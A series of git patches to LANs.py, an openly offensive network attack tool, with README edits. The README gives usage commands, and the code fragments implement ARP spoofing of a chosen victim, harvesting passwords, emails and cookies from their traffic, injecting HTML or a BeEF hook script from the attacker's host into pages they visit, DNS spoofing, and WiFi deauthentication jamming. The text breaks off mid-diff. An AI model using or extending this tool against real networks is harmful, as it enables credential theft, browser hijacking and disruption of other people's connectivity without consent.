From 75229d8c79e858dfc5771192be5d5ff123c132f0 Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 14:57:00 -0500 Subject: [PATCH 01/17] Clarified explanation of prereqs --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index a09a72a..758c16c 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ LANs.py * Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously) -Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option +Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you don't know the IP of your target. Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. @@ -33,7 +33,6 @@ python LANs.py -u -p ``` Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. - Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. From 0807b24feaf7e56b44cdbab25de68b08c7f44bee Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Sun, 9 Nov 2014 15:28:23 -0500 Subject: [PATCH 02/17] improved router IP finding function --- LANs.py | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/LANs.py b/LANs.py index 016d6a5..334dd10 100755 --- a/LANs.py +++ b/LANs.py @@ -166,17 +166,16 @@ def LANsMain(args): ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN) ipr = ipr.communicate()[0] iprs = ipr.split('\n') - ipr = ipr.split() - if args.routerip: - routerIP = args.routerip - else: - try: - routerIP = ipr[2] - except: - exit("You must be connected to the internet to use this.") + routerIP = None for r in iprs: if '/' in r: IPprefix = r.split()[0] + if r.startswith('default') and not args.routerip: + routerIP = r.split()[2] + if args.routerip: + routerIP = args.routerip + if not routerIP: + exit("You must be connected to the internet to use this.") if args.interface: interface = args.interface else: From fc660f52f7f7579f15bba4c8594a64521e84a4cb Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Sun, 9 Nov 2014 15:53:47 -0500 Subject: [PATCH 03/17] better interface detection if not specified --- .gitignore | 1 + LANs.py | 15 ++++++++------- 2 files changed, 9 insertions(+), 7 deletions(-) diff --git a/.gitignore b/.gitignore index f383c2a..1d5b427 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,3 @@ *.log.txt *.pyc +*.swp diff --git a/LANs.py b/LANs.py index 334dd10..dbc69d7 100755 --- a/LANs.py +++ b/LANs.py @@ -170,19 +170,19 @@ def LANsMain(args): for r in iprs: if '/' in r: IPprefix = r.split()[0] - if r.startswith('default') and not args.routerip: - routerIP = r.split()[2] + if r.startswith('default'): + if not args.interface: + interface = r.split()[4] + if not args.routerip: + routerIP = r.split()[2] if args.routerip: routerIP = args.routerip if not routerIP: - exit("You must be connected to the internet to use this.") + exit("[-] You must be connected to the internet to use this.") if args.interface: interface = args.interface - else: - interface = ipr[4] if 'eth' in interface or 'p3p' in interface: - exit( - '[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].') + exit('[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].') if args.ipaddress: victimIP = args.ipaddress else: @@ -1271,6 +1271,7 @@ def iwconfig(): DN = open(os.devnull, 'w') proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) for line in proc.communicate()[0].split('\n'): + print line if len(line) == 0: continue # Isn't an empty string if line[0] != ' ': # Doesn't start with space wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line) From 86fd8d1bcf79d49f3ae5b1837d4c02e950715713 Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Sun, 9 Nov 2014 15:55:53 -0500 Subject: [PATCH 04/17] typo --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 758c16c..26021a2 100644 --- a/README.md +++ b/README.md @@ -4,12 +4,12 @@ LANs.py * Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. * Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. -* Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously) +* Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you don't know the IP of your target. -Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. +Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. All options: From de60978a82433bdbaafec88c2e43e601a263f731 Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 16:38:13 -0500 Subject: [PATCH 05/17] Fixed file filtering Fixed file filtering to enable printing www.jpg.daviddworken.com with URLSpy argument. Removed old unnecesary comments. --- LANs.py | 36 ++++++++++++++++++++---------------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/LANs.py b/LANs.py index 016d6a5..9bd829d 100755 --- a/LANs.py +++ b/LANs.py @@ -126,21 +126,21 @@ def parse_args(): ############################### parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA") parser.add_argument("-ch", "--channel", - help="Listen on and deauth only clients on the specified channel. Example: -ch 6") #######################################I Changed this!!!###############################3333 + help="Listen on and deauth only clients on the specified channel. Example: -ch 6") parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5") parser.add_argument("-no", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", - action='store_true') #####################I changed this!!!#########################33 + action='store_true') parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001") parser.add_argument("--packets", - help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") #####################I changed this!!!!############################## + help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") parser.add_argument("--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", - action='store_true') #######################I changed this!!!########################################3 + action='store_true') parser.add_argument("--accesspoint", - help="Enter the MAC address of a specific access point to target") ##############I changed this!!!##############33 + help="Enter the MAC address of a specific access point to target") return parser.parse_args() #Console colors @@ -640,9 +640,7 @@ class Parser(): self.cookies(host, header_lines) def http_parser(self, load, ack, dport): - load = repr(load)[1:-1] - # Catch fragmented HTTP posts if dport == 80 and load != '': if ack == self.oldHTTPack: @@ -673,15 +671,21 @@ class Parser(): logger.write('[*] ' + url + '\n') if self.args.urlspy: - d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] - if any(i in url for i in d): - return - if len(url) > 146: - print '[*] ' + url[:145] - logger.write('[*] ' + url[:145] + '\n') - else: - print '[*] ' + url - logger.write('[*] ' + url + '\n') + tempURL = url + tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/) + tempURL.strip("/") #Strip all / + fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] + printURL = True # default to printing URL + for fileType in fileFilterList: + if tempURL.endswith(fileType): + printURL = False #Don't print if it is one of the bad file types + if printURL: + if len(url) > 146: + print '[*] ' + url[:145] + logger.write('[*] ' + url[:145] + '\n') + else: + print '[*] ' + url + logger.write('[*] ' + url + '\n') # Print search terms if self.args.post or self.args.urlspy: From eb38dc481e5d9d9af53491a29bc1dd88d58060ba Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 16:48:32 -0500 Subject: [PATCH 06/17] Fix misasignment of variables --- LANs.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/LANs.py b/LANs.py index 00fc44d..6730141 100755 --- a/LANs.py +++ b/LANs.py @@ -671,8 +671,8 @@ class Parser(): if self.args.urlspy: tempURL = url - tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/) - tempURL.strip("/") #Strip all / + tempURL = tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/) + tempURL = tempURL.strip("/") #Strip all / fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] printURL = True # default to printing URL for fileType in fileFilterList: From 59ffefbccbfd16171b103053f66cc7e7763f3203 Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 17:13:17 -0500 Subject: [PATCH 07/17] Filter out ad domains for URLSpy Final fix for #47 --- LANs.py | 40 ++++++++++++++++++++++------------------ 1 file changed, 22 insertions(+), 18 deletions(-) diff --git a/LANs.py b/LANs.py index 6730141..f3bdb34 100755 --- a/LANs.py +++ b/LANs.py @@ -126,19 +126,19 @@ def parse_args(): ############################### parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA") parser.add_argument("-ch", "--channel", - help="Listen on and deauth only clients on the specified channel. Example: -ch 6") + help="Listen on and deauth only clients on the specified channel. Example: -ch 6") parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5") parser.add_argument("-no", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", - action='store_true') + action='store_true') parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001") parser.add_argument("--packets", - help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") + help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") parser.add_argument("--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", - action='store_true') + action='store_true') parser.add_argument("--accesspoint", help="Enter the MAC address of a specific access point to target") return parser.parse_args() @@ -166,23 +166,24 @@ def LANsMain(args): ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN) ipr = ipr.communicate()[0] iprs = ipr.split('\n') - routerIP = None + ipr = ipr.split() + if args.routerip: + routerIP = args.routerip + else: + try: + routerIP = ipr[2] + except: + exit("You must be connected to the internet to use this.") for r in iprs: if '/' in r: IPprefix = r.split()[0] - if r.startswith('default'): - if not args.interface: - interface = r.split()[4] - if not args.routerip: - routerIP = r.split()[2] - if args.routerip: - routerIP = args.routerip - if not routerIP: - exit("[-] You must be connected to the internet to use this.") if args.interface: interface = args.interface + else: + interface = ipr[4] if 'eth' in interface or 'p3p' in interface: - exit('[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].') + exit( + '[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].') if args.ipaddress: victimIP = args.ipaddress else: @@ -670,14 +671,18 @@ class Parser(): logger.write('[*] ' + url + '\n') if self.args.urlspy: + fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] + domainFilterList = ['adzerk.net', 'adwords.google.com', 'googleads.g.doubleclick.net', 'pagead2.googlesyndication.com'] tempURL = url tempURL = tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/) tempURL = tempURL.strip("/") #Strip all / - fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] printURL = True # default to printing URL - for fileType in fileFilterList: + for fileType in fileFilterList: #Used to check if it is one of the blacklisted file types if tempURL.endswith(fileType): printURL = False #Don't print if it is one of the bad file types + for blockedDomain in domainFilterList: + if blockedDomain in tempURL: + printURL = False #Don't print if it is one of the blocked domains if printURL: if len(url) > 146: print '[*] ' + url[:145] @@ -1275,7 +1280,6 @@ def iwconfig(): DN = open(os.devnull, 'w') proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) for line in proc.communicate()[0].split('\n'): - print line if len(line) == 0: continue # Isn't an empty string if line[0] != ' ': # Doesn't start with space wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line) From 64c37bcdca07b0f7b8dfbf1c7dd7e95bea69de5f Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 17:18:29 -0500 Subject: [PATCH 08/17] Added tcpdump to dependency list --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 26021a2..6bf7c4d 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ LANs.py * Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. -Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you don't know the IP of your target. +Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target. Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. From 51c467a97fd72e81a28ec8d8d6e1aa2d97c9ba3c Mon Sep 17 00:00:00 2001 From: David Dworken Date: Sun, 9 Nov 2014 17:39:19 -0500 Subject: [PATCH 09/17] Removed duplicate dependency --- LANs.py | 1 - 1 file changed, 1 deletion(-) diff --git a/LANs.py b/LANs.py index f3bdb34..b19af4f 100755 --- a/LANs.py +++ b/LANs.py @@ -64,7 +64,6 @@ from twisted.internet.protocol import Protocol, Factory from sys import exit from threading import Thread, Lock import argparse -import signal from base64 import b64decode from subprocess import * from zlib import decompressobj, decompress From 05886c5d02372d2d8e228499fe62801ab5894006 Mon Sep 17 00:00:00 2001 From: David Dworken Date: Mon, 10 Nov 2014 13:01:58 -0500 Subject: [PATCH 10/17] Test update to fix signal handling --- LANs.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/LANs.py b/LANs.py index b19af4f..3b647ea 100755 --- a/LANs.py +++ b/LANs.py @@ -72,7 +72,7 @@ from cStringIO import StringIO import requests import sys import time -from signal import SIGINT, signal +#from signal import SIGINT, signal import signal import socket import fcntl @@ -1246,7 +1246,7 @@ def wifijammerMain(args): hop.daemon = True hop.start() - signal(SIGINT, stop) + signal.signal(signal.SIGINT, stop) try: sniff(iface=mon_iface, store=0, prn=cb) From cf27da06cc5a07308a6f6987b6c1a9c97566e3b2 Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Fri, 2 Jan 2015 17:07:09 -0700 Subject: [PATCH 11/17] added requirements.txt --- LANs.py | 15 ++++----------- requirements.txt | 3 +++ 2 files changed, 7 insertions(+), 11 deletions(-) create mode 100644 requirements.txt diff --git a/LANs.py b/LANs.py index 3b647ea..fe39ae9 100755 --- a/LANs.py +++ b/LANs.py @@ -37,28 +37,21 @@ def module_check(module): exit('[-] Exiting due to missing dependency') import os - try: import nfqueue except Exception: + raise module_check('nfqueue') import nfqueue import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) -try: - from scapy.all import * -except Exception: - module_check('scapy') - from scapy.all import * +from scapy.all import * conf.verb = 0 # Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server conf.checkIPaddr = 0 -try: - from twisted.internet import reactor -except Exception: - module_check('twisted') - from twisted.internet import reactor +from twisted.internet import reactor +from twisted.internet import reactor from twisted.internet.interfaces import IReadDescriptor from twisted.internet.protocol import Protocol, Factory from sys import exit diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..ea0b7f5 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +scapy +twisted +requests From a24888aeeeff17604d99cea85a76def1c6f084f0 Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Wed, 4 Feb 2015 23:19:09 -0700 Subject: [PATCH 12/17] cleaned up the code --- LANs.py | 32 +++++++++++++------------------- README.md | 25 +++++++++---------------- 2 files changed, 22 insertions(+), 35 deletions(-) diff --git a/LANs.py b/LANs.py index fe39ae9..f35ee5a 100755 --- a/LANs.py +++ b/LANs.py @@ -13,13 +13,13 @@ Prerequisites: Linux Note: This script flushes iptables before and after usage. -To do: 1. Rogue DHCP server - 2. Refactor with lots of smaller functions - 3. Mass wifi jammer - 4. Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?) - 5. Add karma MITM technique - 6. Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through - 7. Integrate with wifite +To do: + *** Finish https://github.com/DanMcInerney/net-creds and plug it in as the LANs.py main cred engine + Refactor with lots of smaller functions + Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?) + Add karma MITM technique + Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through + Integrate with wifite would be cool ''' @@ -133,6 +133,8 @@ def parse_args(): action='store_true') parser.add_argument("--accesspoint", help="Enter the MAC address of a specific access point to target") + parser.add_argument("--jam", + help="Jam all wifi in range", action="store_true") return parser.parse_args() #Console colors @@ -154,6 +156,7 @@ interface = '' def LANsMain(args): global victimIP, interface + #Find the gateway and interface ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN) ipr = ipr.communicate()[0] @@ -1248,7 +1251,6 @@ def wifijammerMain(args): print '\n[' + R + '!' + W + '] Closing' sys.exit(0) - def get_mon_iface(args): global monitor_on monitors, interfaces = iwconfig() @@ -1594,16 +1596,8 @@ if __name__ == "__main__": if args.pcap: pcap_handler(args) exit('[-] Finished parsing pcap file') - if args.skip is not None or args.channel is not None or args.maximum is not None or args.noupdate is not False or args.timeinterval is not None or args.packets is not None or args.directedonly is not False or args.accesspoint is not None: - ###If wifijammer arguments are given - if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None: - ###If LANs.py arguments are given - ###Both LANs.py arguments and wifijammer arguments are given. This will not work since wifijammer jams the network that LANs.py is trying to monitor - exit('Error. Cannot jam WiFi and monitor WiFi simultaneously') - if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None: - ###If LANs.py arguments are given, then run as LANs.py - LANsMain(args) - else: - ###If no LANs.py arguments are given, then run as wifijammer (expected behavior of jamming wifi when no arguments given is continued) + if args.jam: wifijammerMain(args) + else: + LANsMain(args) diff --git a/README.md b/README.md index 6bf7c4d..535ef72 100644 --- a/README.md +++ b/README.md @@ -90,48 +90,41 @@ Example 2: This will spoof the domain eff.org and subdomains of eff.org. When th python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c 'Owned.' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10 ``` + #### Jam all WiFi networks: ``` shell -python LANs.py +python LANs.py --jam ``` + +#### Jam just one access point (router) +``` shell +python Lans.py --jam --accesspoint 01:MA:C0:AD:DY + + ### All options: ----- Normal Usage: * -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js - * -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject - * -d: open an xterm with driftnet to see all images they view - * -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com - * -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this - * -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN - * -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting - * -i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0 - * -ip: target this IP address - * -n: performs a quick nmap scan of the target - * -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt - * -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received - * -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument - * -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it - * -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it - * -v: show verbose URLs which do not truncate at 150 characters like -u + * --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary Wifi Jamming: From 36797adb4c01f8a97a579d21586c2a17740863dd Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Wed, 4 Feb 2015 23:21:02 -0700 Subject: [PATCH 13/17] typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 535ef72..1a43255 100644 --- a/README.md +++ b/README.md @@ -101,7 +101,7 @@ python LANs.py --jam #### Jam just one access point (router) ``` shell python Lans.py --jam --accesspoint 01:MA:C0:AD:DY - +``` ### All options: ----- From 5a17c831460aef44130738734c84163f01839838 Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Wed, 4 Mar 2015 08:51:01 -0700 Subject: [PATCH 14/17] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 1a43255..bab6795 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,5 @@ +If you have any issues running this script I'd suggest checking out [MITMf](https://github.com/byt3bl33d3r/MITMf) which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine. + LANs.py ======== From ef9f7dad126fbc66abccc34680a3baf031477b6f Mon Sep 17 00:00:00 2001 From: orthographic-pedant Date: Wed, 7 Oct 2015 14:46:12 -0400 Subject: [PATCH 15/17] Fix typographical error(s) Changed conjuction to conjunction in README. --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bab6795..cd5aad2 100644 --- a/README.md +++ b/README.md @@ -82,7 +82,7 @@ python LANs.py -a -r 80.87.128.67 ``` shell python LANs.py -dns eff.org ``` -Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjuction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar. +Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar. Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP. From 4ad2333192575cb7f5639658babc6278e7f8da8d Mon Sep 17 00:00:00 2001 From: Dan McInerney Date: Sun, 22 Nov 2015 11:56:13 -0700 Subject: [PATCH 16/17] fixed monitor mode --- LANs.py | 407 ++------------------------------------------------------ 1 file changed, 12 insertions(+), 395 deletions(-) diff --git a/LANs.py b/LANs.py index f35ee5a..a67e820 100755 --- a/LANs.py +++ b/LANs.py @@ -12,15 +12,6 @@ Prerequisites: Linux twisted Note: This script flushes iptables before and after usage. - -To do: - *** Finish https://github.com/DanMcInerney/net-creds and plug it in as the LANs.py main cred engine - Refactor with lots of smaller functions - Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?) - Add karma MITM technique - Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through - Integrate with wifite would be cool - ''' @@ -40,7 +31,6 @@ import os try: import nfqueue except Exception: - raise module_check('nfqueue') import nfqueue import logging @@ -186,6 +176,7 @@ def LANsMain(args): au.users(IPprefix, routerIP) print '\n[*] Turning off monitor mode' os.system('airmon-ng stop %s >/dev/null 2>&1' % au.monmode) + os.system('service network-manager restart') try: victimIP = raw_input('[*] Enter the non-router IP to spoof: ') except KeyboardInterrupt: @@ -1025,7 +1016,8 @@ class active_users(): def users(self, IPprefix, routerIP): - print '[*] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n %s]' % IPprefix + print '[*] Running ARP scan to identify users on the network; this may take a minute' + print ' nmap -sn -n %s' % IPprefix iplist = [] maclist = [] try: @@ -1059,7 +1051,8 @@ class active_users(): exit('[-] Router MAC not found. Exiting.') # Do nbtscan for windows netbios names - print '[*] Running nbtscan to get Windows netbios names - [nbtscan %s]' % IPprefix + print '[*] Running nbtscan to get Windows netbios names' + print ' nbtscan %s' % IPprefix try: nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN) nbt = nbt.communicate()[0] @@ -1080,14 +1073,15 @@ class active_users(): a.append(nbtname) # Start monitor mode - print '[*] Enabling monitor mode [airmon-ng ' + 'start ' + interface + ']' try: - promiscSearch = Popen(['airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN) - promisc = promiscSearch.communicate()[0] - monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc) - self.monmode = monmodeSearch.group(1) + print '[*] Enabling monitor mode' + print ' airmon-ng check kill' + os.system('airmon-ng check kill') + print ' airmon-ng start ' + interface + os.system('airmon-ng start ' + interface) + self.monmode = interface+'mon' except Exception: - exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?') + exit('[-] Enabling monitor mode failed') sniff(iface=self.monmode, prn=self.pkt_cb, store=0) @@ -1212,380 +1206,6 @@ def pcap_handler(args): Spoof().poison(routerIP, victimIP, routerMAC, victimMAC) time.sleep(1.5) -################################# -####End LANs.py Code############# -################################ - -################################ -#####Start wifijammer Code###### -############################### - -clients_APs = [] -APs = [] -lock = Lock() -monitor_on = None -mon_MAC = "" -first_pass = 1 - - -def wifijammerMain(args): - confirmJam = raw_input("Are you sure you want to jam WiFi? This may be illegal in your area. (y/n)") - if "n" in confirmJam: - exit("Program cancelled.") - print("Ok. Jamming.") - mon_iface = get_mon_iface(args) - conf.iface = mon_iface - mon_MAC = mon_mac(mon_iface) - - # Start channel hopping - hop = Thread(target=channel_hop, args=(mon_iface, args)) - hop.daemon = True - hop.start() - - signal.signal(signal.SIGINT, stop) - - try: - sniff(iface=mon_iface, store=0, prn=cb) - except Exception as msg: - remove_mon_iface(mon_iface) - print '\n[' + R + '!' + W + '] Closing' - sys.exit(0) - -def get_mon_iface(args): - global monitor_on - monitors, interfaces = iwconfig() - if args.interface: - monitor_on = True - return args.interface - if len(monitors) > 0: - monitor_on = True - return monitors[0] - else: - # Start monitor mode on a wireless interface - print '[' + G + '*' + W + '] Finding the most powerful interface...' - interface = get_iface(interfaces) - monmode = start_mon_mode(interface) - return monmode - - -def iwconfig(): - monitors = [] - interfaces = {} - DN = open(os.devnull, 'w') - proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) - for line in proc.communicate()[0].split('\n'): - if len(line) == 0: continue # Isn't an empty string - if line[0] != ' ': # Doesn't start with space - wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line) - if not wired_search: # Isn't wired - iface = line[:line.find(' ')] # is the interface - if 'Mode:Monitor' in line: - monitors.append(iface) - elif 'IEEE 802.11' in line: - if "ESSID:\"" in line: - interfaces[iface] = 1 - else: - interfaces[iface] = 0 - return monitors, interfaces - - -def get_iface(interfaces): - scanned_aps = [] - DN = open(os.devnull, 'w') - if len(interfaces) < 1: - sys.exit('[' + R + '-' + 